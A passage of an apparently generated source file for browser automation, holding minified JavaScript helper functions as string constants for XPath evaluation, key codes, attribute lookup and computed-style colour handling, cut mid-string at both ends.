"hild;b;b=b.nextSibling)F(b,c,d)&&a.matches(b)&&f.add(b);return f};funct"\
"ion H(){this.g=this.f=null;this.l=0}function I(a){this.p=a;this.next=th"\
"is.n=null}H.prototype.unshift=function(a){a=new I(a);a.next=this.f;this"\
".g?this.f.n=a:this.f=this.g=a;this.f=a;this.l++};H.prototype.add=functi"\
"on(a){a=new I(a);a.n=this.g;this.f?this.g.next=a:this.f=this.g=a;this.g"\
"=a;this.l++};function J(a){return(a=a.f)?a.p:null}function K(a){return "\
"new L(a,!1)}function L(a,b){this.J=a;this.o=(this.q=b)?a.g:a.f;this.u=n"\
"ull}\nL.prototype.next=function(){var a=this.o;if(null==a)return null;v"\
"ar b=this.u=a;this.o=this.q?a.n:a.next;return b.p};function N(a,b,c,d,f"\
"){b=b.evaluate(d);c=c.evaluate(d);var g;if(b instanceof H&&c instanceof"\
" H){f=K(b);for(d=f.next();d;d=f.next())for(b=K(c),g=b.next();g;g=b.next"\
"())if(a(E(d),E(g)))return!0;return!1}if(b instanceof H||c instanceof H)"\
"{b instanceof H?f=b:(f=c,c=b);f=K(f);b=typeof c;for(d=f.next();d;d=f.ne"\
"xt()){switch(b){case \"number\":d=+E(d);break;case \"boolean\":d=!!E(d)"\
";break;case \"string\":d=E(d);break;default:throw Error(\"Illegal primi"\
"tive type for comparison.\");}if(a(d,c))return!0}return!1}return f?\n\""\
"boolean\"==typeof b||\"boolean\"==typeof c?a(!!b,!!c):\"number\"==typeo"\
"f b||\"number\"==typeof c?a(+b,+c):a(b,c):a(+b,+c)}function O(a,b,c,d){"\
"this.v=a;this.L=b;this.s=c;this.t=d}O.prototype.toString=function(){ret"\
"urn this.v};var fa={};function P(a,b,c,d){if(a in fa)throw Error(\"Bina"\
"ry operator already created: \"+a);a=new O(a,b,c,d);fa[a.toString()]=a}"\
"P(\"div\",6,1,function(a,b,c){return a.d(c)/b.d(c)});P(\"mod\",6,1,func"\
"tion(a,b,c){return a.d(c)%b.d(c)});P(\"*\",6,1,function(a,b,c){return a"\
".d(c)*b.d(c)});\nP(\"+\",5,1,function(a,b,c){return a.d(c)+b.d(c)});P("\
"\"-\",5,1,function(a,b,c){return a.d(c)-b.d(c)});P(\"<\",4,2,function(a"\
",b,c){return N(function(a,b){return a<b},a,b,c)});P(\">\",4,2,function("\
"a,b,c){return N(function(a,b){return a>b},a,b,c)});P(\"<=\",4,2,functio"\
"n(a,b,c){return N(function(a,b){return a<=b},a,b,c)});P(\">=\",4,2,func"\
"tion(a,b,c){return N(function(a,b){return a>=b},a,b,c)});P(\"=\",3,2,fu"\
"nction(a,b,c){return N(function(a,b){return a==b},a,b,c,!0)});\nP(\"!="\
"\",3,2,function(a,b,c){return N(function(a,b){return a!=b},a,b,c,!0)});"\
"P(\"and\",2,2,function(a,b,c){return a.j(c)&&b.j(c)});P(\"or\",1,2,func"\
"tion(a,b,c){return a.j(c)||b.j(c)});function ga(a,b,c,d,f,g,r,v,y){this"\
".m=a;this.s=b;this.I=c;this.H=d;this.G=f;this.t=g;this.F=r;this.D=void "\
"0!==v?v:r;this.K=!!y}ga.prototype.toString=function(){return this.m};va"\
"r ha={};function Q(a,b,c,d,f,g,r,v){if(a in ha)throw Error(\"Function a"\
"lready created: \"+a+\".\");ha[a]=new ga(a,b,c,d,!1,f,g,r,v)}Q(\"boolea"\
"n\",2,!1,!1,function(a,b){return b.j(a)},1);Q(\"ceiling\",1,!1,!1,funct"\
"ion(a,b){return Math.ceil(b.d(a))},1);\nQ(\"concat\",3,!1,!1,function(a"\
",b){var c=ba(arguments,1);return aa(c,function(b,c){return b+c.c(a)})},"\
"2,null);Q(\"contains\",2,!1,!1,function(a,b,c){b=b.c(a);a=c.c(a);return"\
"-1!=b.indexOf(a)},2);Q(\"count\",1,!1,!1,function(a,b){return b.evaluat"\
"e(a).l},1,1,!0);Q(\"false\",2,!1,!1,e(!1),0);Q(\"floor\",1,!1,!1,functi"\
"on(a,b){return Math.floor(b.d(a))},1);\nQ(\"id\",4,!1,!1,function(a,b){"\
"var c=a.h(),d=9==c.nodeType?c:c.ownerDocument,c=b.c(a).split(/\\s+/),f="\
"[];p(c,function(a){a=d.getElementById(a);!a||0<=n(f,a)||f.push(a)});f.s"\
"ort(ca);var g=new H;p(f,function(a){g.add(a)});return g},1);Q(\"lang\","\
"2,!1,!1,e(!1),1);Q(\"last\",1,!0,!1,function(a){if(1!=arguments.length)"\
"throw Error(\"Function last expects ()\");return a.B()},0);Q(\"local-na"\
"me\",3,!1,!0,function(a,b){var c=b?J(b.evaluate(a)):a.h();return c?c.no"\
"deName.toLowerCase():\"\"},0,1,!0);\nQ(\"name\",3,!1,!0,function(a,b){v"\
"ar c=b?J(b.evaluate(a)):a.h();return c?c.nodeName.toLowerCase():\"\"},0"\
",1,!0);Q(\"namespace-uri\",3,!0,!1,e(\"\"),0,1,!0);Q(\"normalize-space"\
"\",3,!1,!0,function(a,b){return(b?b.c(a):E(a.h())).replace(/[\\s\\xa0]+"\
"/g,\" \").replace(/^\\s+|\\s+$/g,\"\")},0,1);Q(\"not\",2,!1,!1,function"\
"(a,b){return!b.j(a)},1);Q(\"number\",1,!1,!0,function(a,b){return b?b.d"\
"(a):+E(a.h())},0,1);Q(\"position\",1,!0,!1,function(a){return a.C()},0)"\
";Q(\"round\",1,!1,!1,function(a,b){return Math.round(b.d(a))},1);\nQ(\""\
"starts-with\",2,!1,!1,function(a,b,c){b=b.c(a);a=c.c(a);return 0==b.las"\
"tIndexOf(a,0)},2);Q(\"string\",3,!1,!0,function(a,b){return b?b.c(a):E("\
"a.h())},0,1);Q(\"string-length\",1,!1,!0,function(a,b){return(b?b.c(a):"\
"E(a.h())).length},0,1);\nQ(\"substring\",3,!1,!1,function(a,b,c,d){c=c."\
"d(a);if(isNaN(c)||Infinity==c||-Infinity==c)return\"\";d=d?d.d(a):Infin"\
"ity;if(isNaN(d)||-Infinity===d)return\"\";c=Math.round(c)-1;var f=Math."\
"max(c,0);a=b.c(a);if(Infinity==d)return a.substring(f);b=Math.round(d);"\
"return a.substring(f,c+b)},2,3);Q(\"substring-after\",3,!1,!1,function("\
"a,b,c){b=b.c(a);a=c.c(a);c=b.indexOf(a);return-1==c?\"\":b.substring(c+"\
"a.length)},2);\nQ(\"substring-before\",3,!1,!1,function(a,b,c){b=b.c(a)"\
";a=c.c(a);a=b.indexOf(a);return-1==a?\"\":b.substring(0,a)},2);Q(\"sum"\
"\",1,!1,!1,function(a,b){for(var c=K(b.evaluate(a)),d=0,f=c.next();f;f="\
"c.next())d+=+E(f);return d},1,1,!0);Q(\"translate\",3,!1,!1,function(a,"\
"b,c,d){b=b.c(a);c=c.c(a);var f=d.c(a);a=[];for(d=0;d<c.length;d++){var "\
"g=c.charAt(d);g in a||(a[g]=f.charAt(d))}c=\"\";for(d=0;d<b.length;d++)"\
"g=b.charAt(d),c+=g in a?a[g]:g;return c},3);Q(\"true\",2,!1,!1,e(!0),0)"\
";function ia(a,b,c,d){this.m=a;this.A=b;this.q=c;this.O=d}ia.prototype."\
"toString=function(){return this.m};var ja={};function R(a,b,c,d){if(a i"\
"n ja)throw Error(\"Axis already created: \"+a);ja[a]=new ia(a,b,c,!!d)}"\
"R(\"ancestor\",function(a,b){for(var c=new H,d=b;d=d.parentNode;)a.matc"\
"hes(d)&&c.unshift(d);return c},!0);R(\"ancestor-or-self\",function(a,b)"\
"{var c=new H,d=b;do a.matches(d)&&c.unshift(d);while(d=d.parentNode);re"\
"turn c},!0);\nR(\"attribute\",function(a,b){var c=new H,d=a.getName(),f"\
"=b.attributes;if(f)if(\"*\"==d)for(var d=0,g;g=f[d];d++)c.add(g);else(g"\
"=f.getNamedItem(d))&&c.add(g);return c},!1);R(\"child\",function(a,b,c,"\
"d,f){return ea.call(null,a,b,k(c)?c:null,k(d)?d:null,f||new H)},!1,!0);"\
"R(\"descendant\",G,!1,!0);R(\"descendant-or-self\",function(a,b,c,d){va"\
"r f=new H;F(b,c,d)&&a.matches(b)&&f.add(b);return G(a,b,c,d,f)},!1,!0);"\
"\nR(\"following\",function(a,b,c,d){var f=new H;do for(var g=b;g=g.next"\
"Sibling;)F(g,c,d)&&a.matches(g)&&f.add(g),f=G(a,g,c,d,f);while(b=b.pare"\
"ntNode);return f},!1,!0);R(\"following-sibling\",function(a,b){for(var "\
"c=new H,d=b;d=d.nextSibling;)a.matches(d)&&c.add(d);return c},!1);R(\"n"\
"amespace\",function(){return new H},!1);R(\"parent\",function(a,b){var "\
"c=new H;if(9==b.nodeType)return c;if(2==b.nodeType)return c.add(b.owner"\
"Element),c;var d=b.parentNode;a.matches(d)&&c.add(d);return c},!1);\nR("\
"\"preceding\",function(a,b,c,d){var f=new H,g=[];do g.unshift(b);while("\
"b=b.parentNode);for(var r=1,v=g.length;r<v;r++){var y=[];for(b=g[r];b=b"\
".previousSibling;)y.unshift(b);for(var M=0,oa=y.length;M<oa;M++)b=y[M],"\
"F(b,c,d)&&a.matches(b)&&f.add(b),f=G(a,b,c,d,f)}return f},!0,!0);R(\"pr"\
"eceding-sibling\",function(a,b){for(var c=new H,d=b;d=d.previousSibling"\
";)a.matches(d)&&c.unshift(d);return c},!0);R(\"self\",function(a,b){var"\
" c=new H;a.matches(b)&&c.add(b);return c},!1);function S(a,b){return!!a"\
"&&1==a.nodeType&&(!b||a.tagName.toUpperCase()==b)}function ka(a){return"\
" S(a,\"OPTION\")?!0:S(a,\"INPUT\")?(a=a.type.toLowerCase(),\"checkbox\""\
"==a||\"radio\"==a):!1}var la=/[;]+(?=(?:(?:[^\"]*\"){2})*[^\"]*$)(?=(?:"\
"(?:[^']*'){2})*[^']*$)(?=(?:[^()]*\\([^()]*\\))*[^()]*$)/;\nfunction ma"\
"(a){var b=[];p(a.split(la),function(a){var d=a.indexOf(\":\");0<d&&(a=["\
"a.slice(0,d),a.slice(d+1)],2==a.length&&b.push(a[0].toLowerCase(),\":\""\
",a[1],\";\"))});b=b.join(\"\");return b=\";\"==b.charAt(b.length-1)?b:b"\
"+\";\"}function T(a,b){b=b.toLowerCase();if(\"style\"==b)return ma(a.st"\
"yle.cssText);var c=a.getAttributeNode(b);return c&&c.specified?c.value:"\
"null};function U(a,b){this.i={};this.e=[];var c=arguments.length;if(1<c"\
"){if(c%2)throw Error(\"Uneven number of arguments\");for(var d=0;d<c;d+"\
"=2)this.set(arguments[d],arguments[d+1])}else if(a){var f;if(a instance"\
"of U)for(d=na(a),pa(a),f=[],c=0;c<a.e.length;c++)f.push(a.i[a.e[c]]);el"\
"se{var c=[],g=0;for(d in a)c[g++]=d;d=c;c=[];g=0;for(f in a)c[g++]=a[f]"\
";f=c}for(c=0;c<d.length;c++)this.set(d[c],f[c])}}U.prototype.k=0;U.prot"\
"otype.w=0;function na(a){pa(a);return a.e.concat()}\nfunction pa(a){if("\
"a.k!=a.e.length){for(var b=0,c=0;b<a.e.length;){var d=a.e[b];Object.pro"\
"totype.hasOwnProperty.call(a.i,d)&&(a.e[c++]=d);b++}a.e.length=c}if(a.k"\
"!=a.e.length){for(var f={},c=b=0;b<a.e.length;)d=a.e[b],Object.prototyp"\
"e.hasOwnProperty.call(f,d)||(a.e[c++]=d,f[d]=1),b++;a.e.length=c}}U.pro"\
"totype.get=function(a,b){return Object.prototype.hasOwnProperty.call(th"\
"is.i,a)?this.i[a]:b};\nU.prototype.set=function(a,b){Object.prototype.h"\
"asOwnProperty.call(this.i,a)||(this.k++,this.e.push(a),this.w++);this.i"\
"[a]=b};var V={};function W(a,b,c){l(a)&&(a=a.a);a=new qa(a,b,c);!b||b i"\
"n V&&!c||(V[b]={key:a,shift:!1},c&&(V[c]={key:a,shift:!0}));return a}fu"\
"nction qa(a,b,c){this.code=a;this.r=b||null;this.M=c||this.r}W(8);W(9);"\
"W(13);var ra=W(16),sa=W(17),ta=W(18);W(19);W(20);W(27);W(32,\" \");W(33"\
");W(34);W(35);W(36);W(37);W(38);W(39);W(40);W(44);W(45);W(46);W(48,\"0"\
"\",\")\");W(49,\"1\",\"!\");W(50,\"2\",\"@\");W(51,\"3\",\"#\");W(52,\""\
"4\",\"$\");W(53,\"5\",\"%\");W(54,\"6\",\"^\");W(55,\"7\",\"&\");W(56,"\
"\"8\",\"*\");W(57,\"9\",\"(\");W(65,\"a\",\"A\");W(66,\"b\",\"B\");\nW("\
"67,\"c\",\"C\");W(68,\"d\",\"D\");W(69,\"e\",\"E\");W(70,\"f\",\"F\");W"\
"(71,\"g\",\"G\");W(72,\"h\",\"H\");W(73,\"i\",\"I\");W(74,\"j\",\"J\");"\
"W(75,\"k\",\"K\");W(76,\"l\",\"L\");W(77,\"m\",\"M\");W(78,\"n\",\"N\")"\
";W(79,\"o\",\"O\");W(80,\"p\",\"P\");W(81,\"q\",\"Q\");W(82,\"r\",\"R\""\
");W(83,\"s\",\"S\");W(84,\"t\",\"T\");W(85,\"u\",\"U\");W(86,\"v\",\"V"\
"\");W(87,\"w\",\"W\");W(88,\"x\",\"X\");W(89,\"y\",\"Y\");W(90,\"z\",\""\
"Z\");var ua=W(w?{b:91,a:91,opera:219}:u?{b:224,a:91,opera:17}:{b:0,a:91"\
",opera:null});W(w?{b:92,a:92,opera:220}:u?{b:224,a:93,opera:17}:{b:0,a:"\
"92,opera:null});\nW(w?{b:93,a:93,opera:0}:u?{b:0,a:0,opera:16}:{b:93,a:"\
"null,opera:0});W({b:96,a:96,opera:48},\"0\");W({b:97,a:97,opera:49},\"1"\
"\");W({b:98,a:98,opera:50},\"2\");W({b:99,a:99,opera:51},\"3\");W({b:10"\
"0,a:100,opera:52},\"4\");W({b:101,a:101,opera:53},\"5\");W({b:102,a:102"\
",opera:54},\"6\");W({b:103,a:103,opera:55},\"7\");W({b:104,a:104,opera:"\
"56},\"8\");W({b:105,a:105,opera:57},\"9\");W({b:106,a:106,opera:A?56:42"\
"},\"*\");W({b:107,a:107,opera:A?61:43},\"+\");W({b:109,a:109,opera:A?10"\
"9:45},\"-\");W({b:110,a:110,opera:A?190:78},\".\");\nW({b:111,a:111,ope"\
"ra:A?191:47},\"/\");W(144);W(112);W(113);W(114);W(115);W(116);W(117);W("\
"118);W(119);W(120);W(121);W(122);W(123);W({b:107,a:187,opera:61},\"=\","\
"\"+\");W(108,\",\");W({b:109,a:189,opera:109},\"-\",\"_\");W(188,\",\","\
"\"<\");W(190,\".\",\">\");W(191,\"/\",\"?\");W(192,\"`\",\"~\");W(219,"\
"\"[\",\"{\");W(220,\"\\\\\",\"|\");W(221,\"]\",\"}\");W({b:59,a:186,ope"\
"ra:59},\";\",\":\");W(222,\"'\",'\"');var X=new U;X.set(1,ra);X.set(2,s"\
"a);X.set(4,ta);X.set(8,ua);(function(a){var b=new U;p(na(a),function(c)"\
"{b.set(a.get(c).code,c)});return b})(X);var va={\"class\":\"className\""\
",readonly:\"readOnly\"},wa=\"async autofocus autoplay checked compact c"\
"omplete controls declare defaultchecked defaultselected defer disabled "\
"draggable ended formnovalidate hidden indeterminate iscontenteditable i"\
"smap itemscope loop multiple muted nohref noresize noshade novalidate n"\
"owrap open paused pubdate readonly required reversed scoped seamless se"\
"eking selected spellcheck truespeed willvalidate\".split(\" \");functio"\
"n xa(a,b){var c=null,d=b.toLowerCase();if(\"style\"==d)return(c=a.style"\
")&&!k(c)&&(c=c.cssText),c;if((\"selected\"==d||\"checked\"==d)&&ka(a)){"\
"if(!ka(a))throw new q(15,\"Element is not selectable\");var d=\"selecte"\
"d\",f=a.type&&a.type.toLowerCase();if(\"checkbox\"==f||\"radio\"==f)d="\
"\"checked\";return a[d]?\"true\":null}c=S(a,\"A\");if(S(a,\"IMG\")&&\"s"\
"rc\"==d||c&&\"href\"==d)return(c=T(a,d))&&(c=a[d]),c;c=va[b]||b;if(0<=n"\
"(wa,d))return(c=null!==T(a,b)||a[c])?\"true\":null;try{f=a[c]}catch(g){"\
"}c=null==f||l(f)?T(a,b):f;\nreturn null!=c?c.toString():null}var Y=[\"_"\
"\"],Z=h;Y[0]in Z||!Z.execScript||Z.execScript(\"var \"+Y[0]);for(var $;"\
"Y.length&&($=Y.shift());)Y.length||void 0===xa?Z=Z[$]?Z[$]:Z[$]={}:Z[$]"\
"=xa;; return this._.apply(null,arguments);}.apply({navigator:typeof win"\
"dow!=undefined?window.navigator:null,document:typeof window!=undefined?"\
"window.document:null}, arguments);}"
GET_EFFECTIVE_STYLE = \
"function(){return function(){function g(a){return function(){return a}}"\
"var h=this;\nfunction k(a){var b=typeof a;if(\"object\"==b)if(a){if(a i"\
"nstanceof Array)return\"array\";if(a instanceof Object)return b;var c=O"\
"bject.prototype.toString.call(a);if(\"[object Window]\"==c)return\"obje"\
"ct\";if(\"[object Array]\"==c||\"number\"==typeof a.length&&\"undefined"\
"\"!=typeof a.splice&&\"undefined\"!=typeof a.propertyIsEnumerable&&!a.p"\
"ropertyIsEnumerable(\"splice\"))return\"array\";if(\"[object Function]"\
"\"==c||\"undefined\"!=typeof a.call&&\"undefined\"!=typeof a.propertyIs"\
"Enumerable&&!a.propertyIsEnumerable(\"call\"))return\"function\"}else r"\
"eturn\"null\";\nelse if(\"function\"==b&&\"undefined\"==typeof a.call)r"\
"eturn\"object\";return b}function l(a){return\"string\"==typeof a};func"\
"tion m(a){return String(a).replace(/\\-([a-z])/g,function(a,c){return c"\
".toUpperCase()})};var p=Array.prototype;function q(a,b){if(l(a))return "\
"l(b)&&1==b.length?a.indexOf(b,0):-1;for(var c=0;c<a.length;c++)if(c in "\
"a&&a[c]===b)return c;return-1}function r(a,b){for(var c=a.length,d=l(a)"\
"?a.split(\"\"):a,e=0;e<c;e++)e in d&&b.call(void 0,d[e],e,a)}function s"\
"(a,b){if(a.reduce)return a.reduce(b,\"\");var c=\"\";r(a,function(d,e){"\
"c=b.call(void 0,c,d,e,a)});return c}function aa(a,b,c){return 2>=argume"\
"nts.length?p.slice.call(a,b):p.slice.call(a,b,c)};var u={aliceblue:\"#f"\
"0f8ff\",antiquewhite:\"#faebd7\",aqua:\"#00ffff\",aquamarine:\"#7fffd4"\
"\",azure:\"#f0ffff\",beige:\"#f5f5dc\",bisque:\"#ffe4c4\",black:\"#0000"\
"00\",blanchedalmond:\"#ffebcd\",blue:\"#0000ff\",blueviolet:\"#8a2be2\""\
",brown:\"#a52a2a\",burlywood:\"#deb887\",cadetblue:\"#5f9ea0\",chartreu"\
"se:\"#7fff00\",chocolate:\"#d2691e\",coral:\"#ff7f50\",cornflowerblue:"\
"\"#6495ed\",cornsilk:\"#fff8dc\",crimson:\"#dc143c\",cyan:\"#00ffff\",d"\
"arkblue:\"#00008b\",darkcyan:\"#008b8b\",darkgoldenrod:\"#b8860b\",dark"\
"gray:\"#a9a9a9\",darkgreen:\"#006400\",\ndarkgrey:\"#a9a9a9\",darkkhaki"\
":\"#bdb76b\",darkmagenta:\"#8b008b\",darkolivegreen:\"#556b2f\",darkora"\
"nge:\"#ff8c00\",darkorchid:\"#9932cc\",darkred:\"#8b0000\",darksalmon:"\
"\"#e9967a\",darkseagreen:\"#8fbc8f\",darkslateblue:\"#483d8b\",darkslat"\
"egray:\"#2f4f4f\",darkslategrey:\"#2f4f4f\",darkturquoise:\"#00ced1\",d"\
"arkviolet:\"#9400d3\",deeppink:\"#ff1493\",deepskyblue:\"#00bfff\",dimg"\
"ray:\"#696969\",dimgrey:\"#696969\",dodgerblue:\"#1e90ff\",firebrick:\""\
"#b22222\",floralwhite:\"#fffaf0\",forestgreen:\"#228b22\",fuchsia:\"#ff"\
"00ff\",gainsboro:\"#dcdcdc\",\nghostwhite:\"#f8f8ff\",gold:\"#ffd700\","\
"goldenrod:\"#daa520\",gray:\"#808080\",green:\"#008000\",greenyellow:\""\
"#adff2f\",grey:\"#808080\",honeydew:\"#f0fff0\",hotpink:\"#ff69b4\",ind"\
"ianred:\"#cd5c5c\",indigo:\"#4b0082\",ivory:\"#fffff0\",khaki:\"#f0e68c"\
"\",lavender:\"#e6e6fa\",lavenderblush:\"#fff0f5\",lawngreen:\"#7cfc00\""\
",lemonchiffon:\"#fffacd\",lightblue:\"#add8e6\",lightcoral:\"#f08080\","\
"lightcyan:\"#e0ffff\",lightgoldenrodyellow:\"#fafad2\",lightgray:\"#d3d"\
"3d3\",lightgreen:\"#90ee90\",lightgrey:\"#d3d3d3\",lightpink:\"#ffb6c1"\
"\",lightsalmon:\"#ffa07a\",\nlightseagreen:\"#20b2aa\",lightskyblue:\"#"\
"87cefa\",lightslategray:\"#778899\",lightslategrey:\"#778899\",lightste"\
"elblue:\"#b0c4de\",lightyellow:\"#ffffe0\",lime:\"#00ff00\",limegreen:"\
"\"#32cd32\",linen:\"#faf0e6\",magenta:\"#ff00ff\",maroon:\"#800000\",me"\
"diumaquamarine:\"#66cdaa\",mediumblue:\"#0000cd\",mediumorchid:\"#ba55d"\
"3\",mediumpurple:\"#9370db\",mediumseagreen:\"#3cb371\",mediumslateblue"\
":\"#7b68ee\",mediumspringgreen:\"#00fa9a\",mediumturquoise:\"#48d1cc\","\
"mediumvioletred:\"#c71585\",midnightblue:\"#191970\",mintcream:\"#f5fff"\
"a\",mistyrose:\"#ffe4e1\",\nmoccasin:\"#ffe4b5\",navajowhite:\"#ffdead"\
"\",navy:\"#000080\",oldlace:\"#fdf5e6\",olive:\"#808000\",olivedrab:\"#"\
"6b8e23\",orange:\"#ffa500\",orangered:\"#ff4500\",orchid:\"#da70d6\",pa"\
"legoldenrod:\"#eee8aa\",palegreen:\"#98fb98\",paleturquoise:\"#afeeee\""\
",palevioletred:\"#db7093\",papayawhip:\"#ffefd5\",peachpuff:\"#ffdab9\""\
",peru:\"#cd853f\",pink:\"#ffc0cb\",plum:\"#dda0dd\",powderblue:\"#b0e0e"\
"6\",purple:\"#800080\",red:\"#ff0000\",rosybrown:\"#bc8f8f\",royalblue:"\
"\"#4169e1\",saddlebrown:\"#8b4513\",salmon:\"#fa8072\",sandybrown:\"#f4"\
"a460\",seagreen:\"#2e8b57\",\nseashell:\"#fff5ee\",sienna:\"#a0522d\",s"\
"ilver:\"#c0c0c0\",skyblue:\"#87ceeb\",slateblue:\"#6a5acd\",slategray:"\
"\"#708090\",slategrey:\"#708090\",snow:\"#fffafa\",springgreen:\"#00ff7"\
"f\",steelblue:\"#4682b4\",tan:\"#d2b48c\",teal:\"#008080\",thistle:\"#d"\
"8bfd8\",tomato:\"#ff6347\",turquoise:\"#40e0d0\",violet:\"#ee82ee\",whe"\
"at:\"#f5deb3\",white:\"#ffffff\",whitesmoke:\"#f5f5f5\",yellow:\"#ffff0"\
"0\",yellowgreen:\"#9acd32\"};var ba=\"background-color border-top-color"\
" border-right-color border-bottom-color border-left-color color outline"\
"-color\".split(\" \"),ca=/#([0-9a-fA-F])([0-9a-fA-F])([0-9a-fA-F])/;fun"\
"ction w(a){if(!x.test(a))throw Error(\"'\"+a+\"' is not a valid hex col"\
"or\");4==a.length&&(a=a.replace(ca,\"#$1$1$2$2$3$3\"));return a.toLower"\
"Case()}var x=/^#(?:[0-9a-f]{3}){1,2}$/i,da=/^(?:rgba)?\\((\\d{1,3}),\\s"\
"?(\\d{1,3}),\\s?(\\d{1,3}),\\s?(0|1|0\\.\\d*)\\)$/i;\nfunction y(a){var"\
" b=a.match(da);if(b){a=Number(b[1]);var c=Number(b[2]),d=Number(b[3]),b"\
"=Number(b[4]);if(0<=a&&255>=a&&0<=c&&255>=c&&0<=d&&255>=d&&0<=b&&1>=b)r"\
"eturn[a,c,d,b]}return[]}var ea=/^(?:rgb)?\\((0|[1-9]\\d{0,2}),\\s?(0|[1"\
"-9]\\d{0,2}),\\s?(0|[1-9]\\d{0,2})\\)$/i;function z(a){var b=a.match(ea"\
");if(b){a=Number(b[1]);var c=Number(b[2]),b=Number(b[3]);if(0<=a&&255>="\
"a&&0<=c&&255>=c&&0<=b&&255>=b)return[a,c,b]}return[]};function A(a,b){i"\
"f(a.contains&&1==b.nodeType)return a==b||a.contains(b);if(\"undefined\""\
"!=typeof a.compareDocumentPosition)return a==b||Boolean(a.compareDocume"\
"ntPosition(b)&16);for(;b&&a!=b;)b=b.parentNode;return b==a}\nfunction f"\
"a(a,b){if(a==b)return 0;if(a.compareDocumentPosition)return a.compareDo"\
"cumentPosition(b)&2?1:-1;if(\"sourceIndex\"in a||a.parentNode&&\"source"\
"Index\"in a.parentNode){var c=1==a.nodeType,d=1==b.nodeType;if(c&&d)ret"\
"urn a.sourceIndex-b.sourceIndex;var e=a.parentNode,f=b.parentNode;retur"\
"n e==f?B(a,b):!c&&A(e,b)?-1*C(a,b):!d&&A(f,a)?C(b,a):(c?a.sourceIndex:e"\
".sourceIndex)-(d?b.sourceIndex:f.sourceIndex)}d=9==a.nodeType?a:a.owner"\
"Document||a.document;c=d.createRange();c.selectNode(a);c.collapse(!0);"\
"\nd=d.createRange();d.selectNode(b);d.collapse(!0);return c.compareBoun"\
"daryPoints(h.Range.START_TO_END,d)}function C(a,b){var c=a.parentNode;i"\
"f(c==b)return-1;for(var d=b;d.parentNode!=c;)d=d.parentNode;return B(d,"\
"a)}function B(a,b){for(var c=b;c=c.previousSibling;)if(c==a)return-1;re"\
"turn 1};function E(a){var b=null,c=a.nodeType;1==c&&(b=a.textContent,b="\
"void 0==b||null==b?a.innerText:b,b=void 0==b||null==b?\"\":b);if(\"stri"\
"ng\"!=typeof b)if(9==c||1==c){a=9==c?a.documentElement:a.firstChild;for"\
"(var c=0,d=[],b=\"\";a;){do 1!=a.nodeType&&(b+=a.nodeValue),d[c++]=a;wh"\
"ile(a=a.firstChild);for(;c&&!(a=d[--c].nextSibling););}}else b=a.nodeVa"\
"lue;return\"\"+b}\nfunction F(a,b,c){if(null===b)return!0;try{if(!a.get"\
"Attribute)return!1}catch(d){return!1}return null==c?!!a.getAttribute(b)"\
":a.getAttribute(b,2)==c}function G(a,b,c,d,e){return ga.call(null,a,b,l"\
"(c)?c:null,l(d)?d:null,e||new H)}\nfunction ga(a,b,c,d,e){b.getElements"\
"ByName&&d&&\"name\"==c?(b=b.getElementsByName(d),r(b,function(b){a.matc"\
"hes(b)&&e.add(b)})):b.getElementsByClassName&&d&&\"class\"==c?(b=b.getE"\
"lementsByClassName(d),r(b,function(b){b.className==d&&a.matches(b)&&e.a"\
"dd(b)})):b.getElementsByTagName&&(b=b.getElementsByTagName(a.getName())"\
",r(b,function(a){F(a,c,d)&&e.add(a)}));return e}function ha(a,b,c,d,e){"\
"for(b=b.firstChild;b;b=b.nextSibling)F(b,c,d)&&a.matches(b)&&e.add(b);r"\
"eturn e};function H(){this.d=this.c=null;this.g=0}function I(a){this.k="\
"a;this.next=this.i=null}H.prototype.unshift=function(a){a=new I(a);a.ne"\
"xt=this.c;this.d?this.c.i=a:this.c=this.d=a;this.c=a;this.g++};H.protot"\
"ype.add=function(a){a=new I(a);a.i=this.d;this.c?this.d.next=a:this.c=t"\
"his.d=a;this.d=a;this.g++};function J(a){return(a=a.c)?a.k:null}functio"\
"n K(a){return new L(a,!1)}function L(a,b){this.B=a;this.j=(this.l=b)?a."\
"d:a.c;this.o=null}\nL.prototype.next=function(){var a=this.j;if(null==a"\
")return null;var b=this.o=a;this.j=this.l?a.i:a.next;return b.k};functi"\
"on M(a,b,c,d,e){b=b.evaluate(d);c=c.evaluate(d);var f;if(b instanceof H"\
"&&c instanceof H){e=K(b);for(d=e.next();d;d=e.next())for(b=K(c),f=b.nex"\
"t();f;f=b.next())if(a(E(d),E(f)))return!0;return!1}if(b instanceof H||c"\
" instanceof H){b instanceof H?e=b:(e=c,c=b);e=K(e);b=typeof c;for(d=e.n"\
"ext();d;d=e.next()){switch(b){case \"number\":d=+E(d);break;case \"bool"\
"ean\":d=!!E(d);break;case \"string\":d=E(d);break;default:throw Error("\
"\"Illegal primitive type for comparison.\");}if(a(d,c))return!0}return!"\
"1}return e?\n\"boolean\"==typeof b||\"boolean\"==typeof c?a(!!b,!!c):\""\
"number\"==typeof b||\"number\"==typeof c?a(+b,+c):a(b,c):a(+b,+c)}funct"\
"ion N(a,b,c,d){this.p=a;this.D=b;this.m=c;this.n=d}N.prototype.toString"\
"=function(){return this.p};var O={};function P(a,b,c,d){if(a in O)throw"\
" Error(\"Binary operator already created: \"+a);a=new N(a,b,c,d);O[a.to"\
"String()]=a}P(\"div\",6,1,function(a,b,c){return a.b(c)/b.b(c)});P(\"mo"\
"d\",6,1,function(a,b,c){return a.b(c)%b.b(c)});P(\"*\",6,1,function(a,b"\
",c){return a.b(c)*b.b(c)});\nP(\"+\",5,1,function(a,b,c){return a.b(c)+"\
"b.b(c)});P(\"-\",5,1,function(a,b,c){return a.b(c)-b.b(c)});P(\"<\",4,2"\
",function(a,b,c){return M(function(a,b){return a<b},a,b,c)});P(\">\",4,"\
"2,function(a,b,c){return M(function(a,b){return a>b},a,b,c)});P(\"<=\","\
"4,2,function(a,b,c){return M(function(a,b){return a<=b},a,b,c)});P(\">="\
"\",4,2,function(a,b,c){return M(function(a,b){return a>=b},a,b,c)});P("\
"\"=\",3,2,function(a,b,c){return M(function(a,b){return a==b},a,b,c,!0)"\
"});\nP(\"!=\",3,2,function(a,b,c){return M(function(a,b){return a!=b},a"\
",b,c,!0)});P(\"and\",2,2,function(a,b,c){return a.f(c)&&b.f(c)});P(\"or"\
"\",1,2,function(a,b,c){return a.f(c)||b.f(c)});function Q(a,b,c,d,e,f,n"\
",t,v){this.h=a;this.m=b;this.A=c;this.w=d;this.v=e;this.n=f;this.u=n;th"\
"is.t=void 0!==t?t:n;this.C=!!v}Q.prototype.toString=function(){return t"\
"his.h};var R={};function S(a,b,c,d,e,f,n,t){if(a in R)throw Error(\"Fun"\
"ction already created: \"+a+\".\");R[a]=new Q(a,b,c,d,!1,e,f,n,t)}S(\"b"\
